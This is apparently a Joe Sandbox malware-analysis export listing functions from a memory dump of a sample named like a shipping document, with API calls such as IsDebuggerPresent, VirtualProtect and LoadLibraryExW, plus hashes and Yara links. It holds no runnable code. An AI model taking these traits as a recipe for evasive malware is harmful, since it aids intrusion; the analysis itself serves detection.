Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 2eb12142784ca8a1351f4c4f258fc711682a64f7831e24a181833171b505e7da
Instruction ID: fb8ae87e6501fa677d060e96910a62a52c5bf365264550b7519c7cf54ed457c7
Opcode Fuzzy Hash: 2eb12142784ca8a1351f4c4f258fc711682a64f7831e24a181833171b505e7da
Instruction Fuzzy Hash: F9914A34A00605DFDB58EF19C4959ADB7E6EF49310B54806EE85A8F3A2DB70ED42CF84

Function 00683A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00683A73

Part of subcall function 006A1405: __lock.LIBCMT ref: 006A140B

Part of subcall function 00683ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00683AF3
Part of subcall function 00683ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00683B08

Part of subcall function 00683D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00683AA3,?), ref: 00683D45
Part of subcall function 00683D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00683AA3,?), ref: 00683D57
Part of subcall function 00683D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00741148,00741130,?,?,?,?,00683AA3,?), ref: 00683DC8
Part of subcall function 00683D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00683AA3,?), ref: 00683E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00683AB3

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: aa2a9d446c816e806f48fe15d55e594f923dd1724e74ecb0911bf3d5b16c9421
Instruction ID: 2274904594594b7fdb927abb827ce855a7937f4899b77269bfc89cd60abfeff4
Opcode Fuzzy Hash: aa2a9d446c816e806f48fe15d55e594f923dd1724e74ecb0911bf3d5b16c9421
Instruction Fuzzy Hash: 3711C075504345DBC300EF69E80591AFBEAEF96710F008A1FF484872B1DB748995CB9A

Function 006AE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 006AEA29
__close_nolock.LIBCMT ref: 006AEA42

Part of subcall function 006A7BDA: __getptd_noexit.LIBCMT ref: 006A7BDA

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 27e0d457700ed1537b9b24a2eb068bf5f75ac38296d4b9caae84086748709571
Instruction ID: c381a7042b802299c21686c294f83e68473d008a8e4a08bfd0017eb793c8f222
Opcode Fuzzy Hash: 27e0d457700ed1537b9b24a2eb068bf5f75ac38296d4b9caae84086748709571
Instruction Fuzzy Hash: 9B11C6B24496109ED351BF64D8413593A636F43331F1A4349E6315F2E3CBB99C018EA9

Function 0069F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 006A395C: __FF_MSGBANNER.LIBCMT ref: 006A3973
Part of subcall function 006A395C: __NMSG_WRITE.LIBCMT ref: 006A397A
Part of subcall function 006A395C: RtlAllocateHeap.NTDLL(00C90000,00000000,00000001,00000001,00000000,?,?,0069F507,?,0000000E), ref: 006A399F

std::exception::exception.LIBCMT ref: 0069F51E
__CxxThrowException@8.LIBCMT ref: 0069F533

Part of subcall function 006A6805: RaiseException.KERNEL32(?,?,0000000E,00736A30,?,?,?,0069F538,0000000E,00736A30,?,00000001), ref: 006A6856

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: b8a543a60009c2539edecb7f6d9012281f87f95f8e741d8ee599b09db30ff87f
Instruction ID: 4f07110a15042d2b43d87bff54b3dd682e827426708eacadf8dd474e8e5fefc5
Opcode Fuzzy Hash: b8a543a60009c2539edecb7f6d9012281f87f95f8e741d8ee599b09db30ff87f
Instruction Fuzzy Hash: 8FF0FF7110021EA7DB10BF9CD8019DEB7EEAF02314F658139F908D2682DBB0DE409BE9

Function 006A3839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A3868
__lock_file.LIBCMT ref: 006A3889

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 29d92c137f3b25749fc35b4985824ea4fab3476527c2129727b5327e7da364f3
Instruction ID: 81ebffe48af37a18ec4f27c6f4777bb77520c6004dd4a1ca3bc47f05e1271ca4
Opcode Fuzzy Hash: 29d92c137f3b25749fc35b4985824ea4fab3476527c2129727b5327e7da364f3
Instruction Fuzzy Hash: DF017171900219ABCF62BFA4CC0149E7B63BF82360F15821DF82456361D7758F61DF95

Function 006A35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

__lock_file.LIBCMT ref: 006A3629

Part of subcall function 006A4E1C: __lock.LIBCMT ref: 006A4E3F

__fclose_nolock.LIBCMT ref: 006A3634

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 13cc93a176c99a3ef105d4f41dcf07b5ffe76a062ccbf41532f16274711c0466
Instruction ID: fade2097b6d651c2abc1218c86bc880d28cd95544b5ceb49cddcd9c87d561a51
Opcode Fuzzy Hash: 13cc93a176c99a3ef105d4f41dcf07b5ffe76a062ccbf41532f16274711c0466
Instruction Fuzzy Hash: 81F0BB71901214AAD7517F65C80275E76A36F53330F29C10CF421AB3C1CB7C8E419F69

Function 0068E8A0 Relevance: 1.7, APIs: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0068E959

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: a885d3ccd95b1c94b80e65016b90ff118fa5dc86cebb19ff9398a9424d49da9d
Instruction ID: f4a797aa8cd49d52f38d558bd672f0f2be5f9572eaa69b909972fe56450684f4
Opcode Fuzzy Hash: a885d3ccd95b1c94b80e65016b90ff118fa5dc86cebb19ff9398a9424d49da9d
Instruction Fuzzy Hash: 8771EA709047889FEF25DF24C8457A97BD2BB52304F08467EEA868B352D776DC85CB42

Function 00F04858 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00F040C8: GetFileAttributesW.KERNELBASE(?), ref: 00F040D3

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00F04990

Memory Dump Source

Source File: 00000000.00000002.2160657406.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f03000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: bc605797c40c26acc7624a5fbe23f4e3dd2929a6706da660efbb10ac09a12393
Instruction ID: ab8da87d0c5ae6fd218ee276aa39e1fff76ac786cf26b7b1a6f1153ac4d8f24d
Opcode Fuzzy Hash: bc605797c40c26acc7624a5fbe23f4e3dd2929a6706da660efbb10ac09a12393
Instruction Fuzzy Hash: D1518571A1021896DF14EFA0CC54BEF7379EF58700F004569B609EB2D0EB799B44DBA5

Function 006A2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 006A2A0B

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 4e277a80b7419e4bee49e04d1e0dc940cd78d541608ba27d2b27746bd57847b6
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: A541B0316807079FDB28AFAEC8A05AF7BA7AF46760F24852DE955C7240EA70DD418F44

Function 0069ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0069EDC7

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 19f06337b21161d6b6a1fefe1a2ba0ff1e93497ace698c02e4a8ecf1ce54e8da
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7031F674A00105DBCB18DF18C480AA9FBBAFF49340B6486A5E409CBB56DB32EDC5CB80

Function 006E040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006E0519

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47a25551370bf162fd1c2da031bb169c64e3a8c4bd6528156053847bea7b6025
Instruction ID: bc67bf0c4aadbc83b0f06c9e20ad9796fb0d160808a5d38a95c39194d977fd85
Opcode Fuzzy Hash: 47a25551370bf162fd1c2da031bb169c64e3a8c4bd6528156053847bea7b6025
Instruction Fuzzy Hash: 2A31BE75101A28DFDF01AF41D19066E7BB2FF48320F20844AEA951B382D7B0A986CF95

Function 006F9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006F9A80

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 585ff52b1274867c58231398657ccf73d845e30ef4da39b343672cd1cf9fcfad
Instruction ID: c90f7b39e4e40691c062b4124e735759c5330eaf20c0aef472f6b4e1f66a8096
Opcode Fuzzy Hash: 585ff52b1274867c58231398657ccf73d845e30ef4da39b343672cd1cf9fcfad
Instruction Fuzzy Hash: FB416E70504641CFEB24DF14C484B1ABBE6BF45304F29899CE99A4B762C372E846CF52

Function 006AED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 8d80f6037d6ead745f98dfd299d0cd58021ef8dcae761c115abbbe62a573eaa9
Instruction ID: f758aa54c9a8721f1156a83dff0c1d3d0262aa27978776e0330cccdc8d54cb67
Opcode Fuzzy Hash: 8d80f6037d6ead745f98dfd299d0cd58021ef8dcae761c115abbbe62a573eaa9
Instruction Fuzzy Hash: 4B21AEB28486009FD7527FA8DC013597AA36F43336F260648F4314B2E3DBB99C018FA9

Function 006841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00684214: FreeLibrary.KERNEL32(00000000,?), ref: 00684247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006839FE,?,00000001), ref: 006841DB

Part of subcall function 00684291: FreeLibrary.KERNEL32(00000000), ref: 006842C4

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: d561384ccc7c66784a46a6fecc4ac048bb17c35cf376c581a603e5860e74d21a
Instruction ID: d80fd85bb07b326b032f0af7e613e03eb93b746c8a6ea46c5b8da2d63893a1bb
Opcode Fuzzy Hash: d561384ccc7c66784a46a6fecc4ac048bb17c35cf376c581a603e5860e74d21a
Instruction Fuzzy Hash: B711E331604307ABDB50FB70DC26FAE77EAAF40700F10852DF596A61C1EE759B019B68

Function 006F9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 006F9B51

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1dd5c0b7e0ba40f066c23b4131208e21a652f8e4701341a857985cd2a71327b5
Instruction ID: 75d73b39286af7e956aa6461d7ecaa26936b865131e087f578b713532bfa7065
Opcode Fuzzy Hash: 1dd5c0b7e0ba40f066c23b4131208e21a652f8e4701341a857985cd2a71327b5
Instruction Fuzzy Hash: 77212A70508601CFEB64DF64C444A5ABBF6BF85304F25496CE59A87761C731E845CF52

Function 006AAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 006AAFC0

Part of subcall function 006A7BDA: __getptd_noexit.LIBCMT ref: 006A7BDA

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 44a89096f13d2073522003989e4a0a656a08a048961456859bc4b452ea3d7b09
Instruction ID: c9fdfe1515e2d8bbea9b017cefdebc3bb0f5ebceb238e9ea44bad3dcb0389545
Opcode Fuzzy Hash: 44a89096f13d2073522003989e4a0a656a08a048961456859bc4b452ea3d7b09
Instruction Fuzzy Hash: C511B2B28096009FD7527FA4DC0175A76A3AF43331F1A4249E5310B1E3C7B88D018FA9

Function 006839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction ID: a1af753529c2f38423ba39084dd4bc5970e585885d3c76e5538818a0f66921d6
Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction Fuzzy Hash: F001863150010EEECF44FF64C8A18FEBB76EF11304F008129B55697195EA309B49CF64

Function 006A2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 006A2AED

Part of subcall function 006A7C0E: __getptd_noexit.LIBCMT ref: 006A7C0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 9a335e7a63132cb7cec0565c6c80f3239c7ba90377e1b2c5971771adebedb978
Instruction ID: 547df9d1d77dd151afdfa4b93be9a81c9b5d96bfedd25c1fd244cf6ab6f36f21
Opcode Fuzzy Hash: 9a335e7a63132cb7cec0565c6c80f3239c7ba90377e1b2c5971771adebedb978
Instruction Fuzzy Hash: 04F0C231580216ABDF61BF68CC023DF36A3BF03320F198419B9149A191C7788E52DF55

Function 00684252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,006839FE,?,00000001), ref: 00684286

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0dd08240080849c89a3acf17f9a7f35aa7b4db4450f45f690728240f13e210bb
Instruction ID: 64952588b6af8d22d0d0cc349dcff947295dcc0c17d92606a954e8907f288f5e
Opcode Fuzzy Hash: 0dd08240080849c89a3acf17f9a7f35aa7b4db4450f45f690728240f13e210bb
Instruction Fuzzy Hash: AFF0157150D712CFCB34AF64D8A0856BBF6AF053253248B2EF2D682610CB329A40DF50

Function 006840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006840C6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
